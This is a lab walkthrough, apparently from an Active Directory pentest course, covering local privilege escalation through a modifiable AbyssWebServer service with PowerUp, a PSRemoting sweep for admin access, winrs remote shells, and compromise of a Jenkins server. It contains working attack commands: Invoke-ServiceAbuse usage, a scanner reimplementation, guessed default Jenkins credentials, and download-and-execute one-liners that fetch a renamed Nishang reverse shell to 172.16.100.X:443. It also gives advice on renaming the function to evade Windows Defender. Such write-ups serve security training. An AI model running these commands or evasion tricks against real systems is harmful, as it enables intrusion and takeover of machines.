🆙Elevate Privileges & gain a shell
Task
• Exploit a service on dcorp-studentx and elevate privileges to local administrator.
• Identify a machine in the domain where studentx has local administrative access.
• Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server.
For this path we'll use PowerUp from the PowerSploit module to check for any privilege escalation path. WinPEAS would also work.
We quickly see that the ServiceName of the modifiable service is AbyssWebServer:
With this information, we can use the matching abuse function, Invoke-ServiceAbuse, to add our current domain user to the local Administrators group ->
Now we are part of the local Administrators group. The access token of our current session does not include the new group yet, so we log off and log on again; after that we have local administrator privileges.
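The service abuse step above, written out as an added example (not code from the original page, and not PowerUp's own code). It assumes PowerUp.ps1 is in the current directory, that the lab user is dcorp\studentx, and that the PowerUp checks have already reported AbyssWebServer as a service whose configuration the current user can modify:

```powershell
# Added example, not from the original page. Assumes PowerUp.ps1 is in the current
# directory and that PowerUp reported AbyssWebServer as a modifiable service.
. .\PowerUp.ps1

# Confirm the finding before abusing it: which services can this user reconfigure?
# (Get-ModifiableService returns the services whose binPath the current user can change.)
Get-ModifiableService | Where-Object { $_.ServiceName -eq 'AbyssWebServer' } |
    Format-List ServiceName, Path, StartName, CanRestart

# Abuse it. Invoke-ServiceAbuse temporarily points the service binary at a command that
# runs with the service's privileges (SYSTEM here), restarts the service, then restores
# the original binary path. With no -Command, the default is to add -UserName to the
# local group given by -LocalGroup, which defaults to Administrators.
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'

# Verify the group membership was written.
net localgroup Administrators | findstr /i studentx

# The current session's token is unchanged until a new logon: this shows no
# BUILTIN\Administrators (S-1-5-32-544) entry until we log off and log back on.
whoami /groups | findstr /i 'S-1-5-32-544'
```

If `Get-ModifiableService` does not list the service, the abuse will fail or, worse, leave the service broken; check first, and note that the user is only effectively an administrator once a fresh logon produces a token containing the group.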
Here's where we are in our enumeration, according to a guy on Discord:
You're local admin on the studentvm machine, then you use Find-PSRemotingLocalAdminAccess to discover you have rights to connect to dcorp-adminsrv (via winrs or PSRemoting).
Next, a good thing to do is to identify a machine in the domain where the user student613 has local administrative access. For this we can use Find-PSRemotingLocalAdminAccess.ps1, which tries to run a command over PSRemoting on every domain computer and reports the ones that answer.
So we see that we have admin access on dcorp-adminsrv and on the student machine. We can connect to dcorp-adminsrv using winrs as the student user:
winrs -r:dcorp-adminsrv cmd
• winrs: stands for Windows Remote Shell, a command-line tool that executes commands on a remote machine over WinRM.
• -r:dcorp-adminsrv: specifies the remote machine to connect to, in this case dcorp-adminsrv.
• cmd: launches the command prompt (cmd.exe) on the remote machine.
So we were able to get a shell on dcorp-adminsrv
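The check that Find-PSRemotingLocalAdminAccess performs, reimplemented as an added example (this is not the script's own code and not code from the original page). It pulls computer names from the domain with ADSI, tries to run one command on each over PSRemoting, and reports the hosts that accept the connection. Two assumptions: WinRM (TCP 5985) is reachable on the targets, and the current user's domain credentials are used for the connection. A successful connection means the user is in the remote machine's Administrators group or, on Windows Server 2012 and later, in Remote Management Users, so treat a hit as "can remote in" and confirm admin rights on the box itself:

```powershell
# Added example, not the original page's or the Find-PSRemotingLocalAdminAccess script's code.
function Find-RemotingAccess {
    param(
        # Optional explicit target list; when empty, every computer object in the domain is tried.
        [string[]]$ComputerName = @()
    )
    if (-not $ComputerName) {
        # ADSI needs no extra module and works with the logged-on user's domain credentials.
        $searcher = [adsisearcher]'(objectCategory=computer)'
        $searcher.PageSize = 500
        $ComputerName = $searcher.FindAll() |
            ForEach-Object { $_.Properties['dnshostname'][0] } |
            Where-Object { $_ }
    }
    foreach ($c in $ComputerName) {
        try {
            # Run a trivial command remotely; -ErrorAction Stop turns any failure into a catch.
            $who = Invoke-Command -ComputerName $c -ErrorAction Stop -ScriptBlock {
                "$env:COMPUTERNAME\$(whoami)"
            }
            [pscustomobject]@{ Computer = $c; Access = $true;  RunsAs = $who }
        } catch {
            [pscustomobject]@{ Computer = $c; Access = $false; RunsAs = $null }
        }
    }
}

# Report only the hosts we can reach.
Find-RemotingAccess | Where-Object Access

# On a hit, either of these gives an interactive shell on the remote host:
#   winrs -r:dcorp-adminsrv cmd
#   Enter-PSSession -ComputerName dcorp-adminsrv
```

Each attempt creates a WinRM session, so this is noisy against a monitored environment: every target records a logon event (and a WinRM connection) for the student user, whether or not access is granted.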
Now let's try to have fun with the Jenkins server without admin access. To do so, we need a user who has privileges to configure builds: a build step executes commands on the build node with the privileges of the Jenkins service, so "Configure" on a project is enough to run code.
We start by going to the Jenkins "People" page, which lists the known users:
It's good to know that Jenkins does not enforce a password policy by default, so admin:admin or felix:felix could be a valid set of credentials.
After trying a few of these we manage to get access as the builduser user, who can Configure builds and Add Build Steps, which lets us execute commands.
To get our reverse shell we are going to use a slightly modified version of Invoke-PowerShellTcp from Nishang. We renamed the function Invoke-PowerShellTcp to Power in the script to bypass Windows Defender's signature for it.
Nishang: https://github.com/samratashok/nishang/tree/master
We then go to the project configuration and add an "Execute Windows batch command" build step to create and execute the batch command ->
If using Invoke-PowerShellTcp, make sure to include the function call in the script (Power -Reverse -IPAddress 172.16.100.X -Port 443) or append it at the end of the command in Jenkins, otherwise the script only defines the function and nothing connects back. Please note that you may always like to rename the function name to something else to avoid detection.
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.X -Port 443
or
powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443
We then launch our HFS server (a Python HTTP server would also work), upload the Invoke-PowerShellTcp.ps1 file to the HFS directory, start a listener on port 443 on our machine, and build the project to trigger the script and receive the reverse shell.